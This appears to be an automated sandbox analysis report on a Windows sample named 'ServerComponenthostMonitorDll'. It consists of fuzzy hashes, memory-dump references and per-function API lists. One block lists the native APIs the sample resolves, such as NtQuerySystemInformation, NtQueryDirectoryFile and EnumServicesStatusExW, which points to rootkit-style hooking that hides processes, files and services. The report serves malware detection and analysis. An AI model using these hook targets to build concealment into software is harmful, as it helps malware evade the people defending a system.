                                                                • Instruction ID: d037290d01d0d7dc3f01685ba923a1524316a7e02c0bdfedb8c05a7d06ded73e
                                                                • Opcode Fuzzy Hash: 2efe26084136253587a455793bef44db0a782ee7d2ae28189080c6a9707f45e6
                                                                • Instruction Fuzzy Hash: 12017C35A0E2899FEB22EBA488601AC7FB0EF02B04F1541E7D454DB2A3D9786A44C741
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2276779366.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bec0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e74e8f0425b018ff51d71068c883f5309d767bbe011b49bc2e8b8c547043157d
                                                                • Instruction ID: 1f37c46e4620842db367582ab558c036647e72ceffbfe3a822502fa724f62312
                                                                • Opcode Fuzzy Hash: e74e8f0425b018ff51d71068c883f5309d767bbe011b49bc2e8b8c547043157d
                                                                • Instruction Fuzzy Hash: 22F0623154F3899FD7129FB088615E93FB8FF46204B1500E6D459CA0A2D96D5706C761
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2268390774.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bac0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d3719c38903d437b921fb15a39a22bcc8a756f0896018566767e12e14f64d7ed
                                                                • Instruction ID: 98e0f5cc76bac9b79db18d3553365f72e10f78f2f6ea0845ba2d194af862a65e
                                                                • Opcode Fuzzy Hash: d3719c38903d437b921fb15a39a22bcc8a756f0896018566767e12e14f64d7ed
                                                                • Instruction Fuzzy Hash: 9BF0B221B1A50E4BEEB8FB7C807967812C29F94744F564079D44EC72B2DDA8AD424608
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2276779366.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bec0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 03b5670c852925ca7116d690323156cc928f567debebe2c0d7d28e5569dc0f06
                                                                • Instruction ID: c050c122188b296a4ccd51c82bfb8c1126ce1de892ef2c2a5be6c8142002d867
                                                                • Opcode Fuzzy Hash: 03b5670c852925ca7116d690323156cc928f567debebe2c0d7d28e5569dc0f06
                                                                • Instruction Fuzzy Hash: 28F0F63244F2CA9FD322DBB088254E97FE4EF03204B1900FAD445C71B2C62E171AD7A1
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2276779366.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bec0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d22a8e422b156d5809998a2f26626c4b4fdbf4edca1dfab634183af3fc6a9455
                                                                • Instruction ID: 9d47f292ede65ca0efe00dca3643e716988737789e356332a97f99dda2a696fb
                                                                • Opcode Fuzzy Hash: d22a8e422b156d5809998a2f26626c4b4fdbf4edca1dfab634183af3fc6a9455
                                                                • Instruction Fuzzy Hash: DD010070A1992C8FDFA8EB48C8A4BA8B7B1FB68301F1041D9800EE3250CB719A84CF05
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2268390774.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bac0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7138457a3c6bd61079ead0882e94c7e1c5824ed01c817869d58e65bbfd7a0277
                                                                • Instruction ID: 80dc0ebca54a7a9fd53f7b1d928457b05761a06f2de36124061126da3db87fbb
                                                                • Opcode Fuzzy Hash: 7138457a3c6bd61079ead0882e94c7e1c5824ed01c817869d58e65bbfd7a0277
                                                                • Instruction Fuzzy Hash: 8DF04F34A089188FCB44EF0CC894DADB7F1FBA8305F014669C40AD32A0CB34E940CB80
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2276779366.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bec0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0e11bc89901eea88440275267480bc63573783128d308149792cbe17a8ca5166
                                                                • Instruction ID: e9033c2f4821837bcf8526c156010f538afb1a9ee591c414fb3dd8b0169a3177
                                                                • Opcode Fuzzy Hash: 0e11bc89901eea88440275267480bc63573783128d308149792cbe17a8ca5166
                                                                • Instruction Fuzzy Hash: 50F0E93850E68D4FF376EAA44D5D3F87955FF01300F150679D49D9B1E2CA1967458341
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2276779366.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bec0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f8c4e0a935f6624af4ff4ca79deace6c12a27b5bf6f0067696c0d0f392a6f97a
                                                                • Instruction ID: 0a30777aad3cc4f2efb8bc8b6001678e9fc435459100b259b90f3a49359a214f
                                                                • Opcode Fuzzy Hash: f8c4e0a935f6624af4ff4ca79deace6c12a27b5bf6f0067696c0d0f392a6f97a
                                                                • Instruction Fuzzy Hash: 46F02E3050E68D4FF376EA944C253F879A0FF10304F15057DD4AD9F1F2CA5926458381
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2268390774.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bac0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a99e3405fcbb08085c4e69bb003518673b9341afd897be30fe8414449901a780
                                                                • Instruction ID: d8879fc13fd938178cc5b70f94f1700d7b391b8a6d8de7a5feb6d6bda9131e87
                                                                • Opcode Fuzzy Hash: a99e3405fcbb08085c4e69bb003518673b9341afd897be30fe8414449901a780
                                                                • Instruction Fuzzy Hash: 41F01230E1A41E4BEBB4FB98C8243B862A1FF84310F5101B9D04DD31B2CE786E828A04
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2268390774.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bac0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d282422eef23423fc6ba86616a2c1e06f20e5f3f98448255c36d765a0b812ff9
                                                                • Instruction ID: 9e90f8db2092ba5af983d6c2165c4c7ca4f7b2d55e9b0d7bd3a1684c958db831
                                                                • Opcode Fuzzy Hash: d282422eef23423fc6ba86616a2c1e06f20e5f3f98448255c36d765a0b812ff9
                                                                • Instruction Fuzzy Hash: 65F03920B0914A4BFBA5A394C4603BD37A0EB69300F1500B9DA4E973E6DD38AE058716
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2268390774.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bac0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: da131de55fe06d4e26c11bb887a7831e823910b4d7ca2845b6b042cfbedd6f37
                                                                • Instruction ID: d9f803c352c1b2d950d5ce2fc69ffe52f595c5aa0b463cc44cde052e0543de14
                                                                • Opcode Fuzzy Hash: da131de55fe06d4e26c11bb887a7831e823910b4d7ca2845b6b042cfbedd6f37
                                                                • Instruction Fuzzy Hash: DBE0E67174D40D4BEB68BB58D4645F83395EB94310F26417DD44DD31B2ED68AB424548
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2268390774.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bac0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e344797771211afc2922f3019d55a4f8fb148a534a150d235a105b698c9fa132
                                                                • Instruction ID: 37561cc99fba4c4a75c123d74ec4938d095c2c28f34b93093d011dff97ad01d9
                                                                • Opcode Fuzzy Hash: e344797771211afc2922f3019d55a4f8fb148a534a150d235a105b698c9fa132
                                                                • Instruction Fuzzy Hash: A7C08C04F0B40F00F83037EE14220BCB1005BC8A10FD30172D01C820E19CDE22C5024E
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2268390774.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bac0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3dedf454f7692e0b85d34c5aa416074987a7efe8b922ee06db73ba81e38974e9
                                                                • Instruction ID: ecfed8b3b76ce94b907b430627e77be1048cf3367c9bcc31241cdeac3c49912f
                                                                • Opcode Fuzzy Hash: 3dedf454f7692e0b85d34c5aa416074987a7efe8b922ee06db73ba81e38974e9
                                                                • Instruction Fuzzy Hash: 25C08C309128088FC900F72CC88486032A0FB0D210BC20090E00DC7170E25AAC80C700
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2268390774.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bac0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5da3138150c8c4d38575ff7b1ebdee873a9ccce04f569dd979f2fd76cd16bac7
                                                                • Instruction ID: 02084ac3a678574cf59fb6e9f57bf3cc6e284d02a723994a3ed6baa7642c88f0
                                                                • Opcode Fuzzy Hash: 5da3138150c8c4d38575ff7b1ebdee873a9ccce04f569dd979f2fd76cd16bac7
                                                                • Instruction Fuzzy Hash: EEC08C3091180C8FC908FB29C88482833A0FB09300BC20090E00ECB170D259DCC1C741
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2276779366.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bec0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 398eeaebebad6b90807c6ee95372bb9b429cfa95b9b76b89aeefc9fb2f23da11
                                                                • Instruction ID: 91b402828e8b6ed5f59731700111df0befd22b8f6ad5514cccdf922dfbd6bb37
                                                                • Opcode Fuzzy Hash: 398eeaebebad6b90807c6ee95372bb9b429cfa95b9b76b89aeefc9fb2f23da11
                                                                • Instruction Fuzzy Hash: BAD0C914B1F55F85F178B681813063D219E5F40700E3201BDF15F419E1CD1F7B016202
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2276779366.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bec0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7164194e321ff11a9c5b58660fdeb581821e2c8107603c55c42c51c06a3cb97c
                                                                • Instruction ID: e2a41966dd02cfa5d16168fbe1560e699121a58175874bfc84ccdcfe96eb81c5
                                                                • Opcode Fuzzy Hash: 7164194e321ff11a9c5b58660fdeb581821e2c8107603c55c42c51c06a3cb97c
                                                                • Instruction Fuzzy Hash: A7C0022471581D9FD6A8EB59C0A4A3873D5EF49301B9180B4E44FCB2B6C929AE45AA10
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2276779366.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bec0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 10794532f01fcdd1f7ed052cc2b25794a36db1ebe5a0981f52805dee9c55737f
                                                                • Instruction ID: 4b62d10403cdb35dc1e76b7a395a0516a306bb925f120b6d82a3d77b5c3796e0
                                                                • Opcode Fuzzy Hash: 10794532f01fcdd1f7ed052cc2b25794a36db1ebe5a0981f52805dee9c55737f
                                                                • Instruction Fuzzy Hash: 69D0921CB0F54B85F63A6A91617823A25ADAF02701E620479D09F41AE1CA1EB7016602
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2276779366.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bec0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2f96dc482758f563d212391642b450211f498e3e28470d008ca30198629bc8be
                                                                • Instruction ID: 7fdca9bca40fd5689448522cd934acc5cce8e43a5b4cea3e5a814a8db945516f
                                                                • Opcode Fuzzy Hash: 2f96dc482758f563d212391642b450211f498e3e28470d008ca30198629bc8be
                                                                • Instruction Fuzzy Hash: 6CD0C924B0F55F87F53A6A81803123911B96F10304E32443DD0BF559E1CD1FBB126211
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2276779366.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bec0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 23294e8329de63afd1a99c1cbfdf5ed9e991c20d9f75d22e24108b892e94881c
                                                                • Instruction ID: f9ee0582b0d01e616e062f48dd63fa17766c6c836b07f8e2c110c2cd3d99489b
                                                                • Opcode Fuzzy Hash: 23294e8329de63afd1a99c1cbfdf5ed9e991c20d9f75d22e24108b892e94881c
                                                                • Instruction Fuzzy Hash: A1C08C42F0F04B41FA20316000392FD83058F22300F2B10B6C048070A38C1A26120201
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2268390774.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bac0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c7b0d7f4884ea56e0602604a0cd8132dafcfb8b3b76d73a7d04ff4c68d1ae71e
                                                                • Instruction ID: 3e02a0f2f4822d05f101cfe7ee734813d212a5660f6b41707258cd2a9aa878e8
                                                                • Opcode Fuzzy Hash: c7b0d7f4884ea56e0602604a0cd8132dafcfb8b3b76d73a7d04ff4c68d1ae71e
                                                                • Instruction Fuzzy Hash: 27C04C02F1D82A47F35E661444719BD54535F9575CF550175E01D8B3DECE5C6A4202C7
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2276779366.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bec0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d1fe486da60a254a16dacb6fb08c19d3cf327f36f883dd5d1f0ba531e12c20af
                                                                • Instruction ID: e97a306a234521f50186b3ba54d030eb8d07582a74d87513fc8cae33ee065a9d
                                                                • Opcode Fuzzy Hash: d1fe486da60a254a16dacb6fb08c19d3cf327f36f883dd5d1f0ba531e12c20af
                                                                • Instruction Fuzzy Hash: A2B09212F0A20F86E23410E406A807C438A4FC51456620B32812E931A1ECAB2A061111
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2268390774.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bac0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1c2280642933cc34031294108ec29d092611aeaf534f60aa8142bbd2019baff1
                                                                • Instruction ID: 4364d99676a9719023cfff381406436e8ecac0f8809650e760f7a1cc39224d59
                                                                • Opcode Fuzzy Hash: 1c2280642933cc34031294108ec29d092611aeaf534f60aa8142bbd2019baff1
                                                                • Instruction Fuzzy Hash: D6B01204D5744F00E83433FA086307870405B48100FC201B0D40C8109198CE1294134A
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2276779366.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bec0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f4e95a14c2647f1d1b36ae475ffbc7dca0bdbb9bec062749b878f3ab36a6883c
                                                                • Instruction ID: ccd031dd69c2e7c4985f3a6e9260e2ac76dbb39c7037a2afe4eee2466581211e
                                                                • Opcode Fuzzy Hash: f4e95a14c2647f1d1b36ae475ffbc7dca0bdbb9bec062749b878f3ab36a6883c
                                                                • Instruction Fuzzy Hash: CEB01244F0F60B53F63220F004B607D00440B04244E230B30D22B493F3DCAE3A101190
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2276779366.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bec0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9b1fbb5491fa3eb95da0fb725a89889ec682eaad4adc35ce2d41d77ed5c6e52e
                                                                • Instruction ID: 1f4197b6b8139d2807e6ce38a485226ab5bfc26f9f636c9ef01326dfa7a08af8
                                                                • Opcode Fuzzy Hash: 9b1fbb5491fa3eb95da0fb725a89889ec682eaad4adc35ce2d41d77ed5c6e52e
                                                                • Instruction Fuzzy Hash: F3B01200F0E20F47F530B0F0047007C00490B85344B564934E20B462E3DC8F3E001250
                                                                APIs
                                                                • IsProcessorFeaturePresent.KERNEL32 ref: 1AFF7E8C
                                                                • RtlCaptureContext.NTDLL ref: 1AFF7EB9
                                                                • RtlLookupFunctionEntry.NTDLL ref: 1AFF7ED3
                                                                • RtlVirtualUnwind.NTDLL ref: 1AFF7F14
                                                                • IsDebuggerPresent.KERNEL32 ref: 1AFF7F68
                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 1AFF7F89
                                                                • UnhandledExceptionFilter.KERNEL32 ref: 1AFF7F94
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                • String ID:
                                                                • API String ID: 3140674995-0
                                                                • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                • Instruction ID: 2c7708a0604df97b5bc4d051ef84cd0b7d15d6eef679da74800e25310aa5e55b
                                                                • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                • Instruction Fuzzy Hash: B9312077205B819AEB659F64E8907DF7364F788744F44442ADA4E47BA8EF38C648C710
                                                                APIs
                                                                • RtlCaptureContext.NTDLL ref: 1AFFB585
                                                                • RtlLookupFunctionEntry.NTDLL ref: 1AFFB59D
                                                                • RtlVirtualUnwind.NTDLL ref: 1AFFB5D8
                                                                • IsDebuggerPresent.KERNEL32 ref: 1AFFB611
                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 1AFFB61B
                                                                • UnhandledExceptionFilter.KERNEL32 ref: 1AFFB626
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                • String ID:
                                                                • API String ID: 1239891234-0
                                                                • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                • Instruction ID: 67eb5793041cb37fbe38f8409d451014c1b5a4e01b5fe48a97e1ebeb570cb056
                                                                • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                • Instruction Fuzzy Hash: 14315C37214F849ADB21DF25E88039F73A4F788B98F900526EA9D47B68EF38C555CB00
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                • String ID:
                                                                • API String ID: 1443284424-0
                                                                • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                • Instruction ID: 8704fd759d15469bafd0722a868b7004c1d9297ef5b5936b214881983cdd3bc7
                                                                • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                • Instruction Fuzzy Hash: ECD1CE72B14B849AE706CF64D4802DE7BB1F349BD8F508516EE8A57B68EE38C55AC700
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: Heap$Process$Allocate$Free$EnumInfoQueryValuelstrlen
                                                                • String ID: d
                                                                • API String ID: 2772000396-2564639436
                                                                • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                • Instruction ID: d451e9c3e6bac68f82e35ea97a57348cd29d160d527a433bb12cc3d4e17f4990
                                                                • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                • Instruction Fuzzy Hash: 60516B76214B8497EB15DF62E58839BB3A1F78DBC4F448125EB8907B24DF38C166CB40
                                                                APIs
                                                                • GetCurrentThread.KERNEL32 ref: 1AFF1EBF
                                                                  • Part of subcall function 1AFF2174: GetModuleHandleA.KERNEL32 ref: 1AFF218C
                                                                  • Part of subcall function 1AFF2174: GetProcAddress.KERNEL32 ref: 1AFF219D
                                                                  • Part of subcall function 1AFF5C10: GetCurrentThreadId.KERNEL32 ref: 1AFF5C4B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                • API String ID: 4175298099-1975688563
                                                                • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                • Instruction ID: 1c19ea0c2c63885203a2b88a132fe25f1d6ed06530b9f2738549dd07ae2efe79
                                                                • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                • Instruction Fuzzy Hash: 8931E97A612A4AA5EF0AEFA8EC507D63321B7493C4FC04923E51913175DF39C69EC381
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: Heap$Process$AllocateEnumFreeInfoQueryValue
                                                                • String ID: d
                                                                • API String ID: 1572912380-2564639436
                                                                • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                • Instruction ID: 84d747351bab65121b93fecfc0bd46159ee6bba903ba414d50a60d06c16917f8
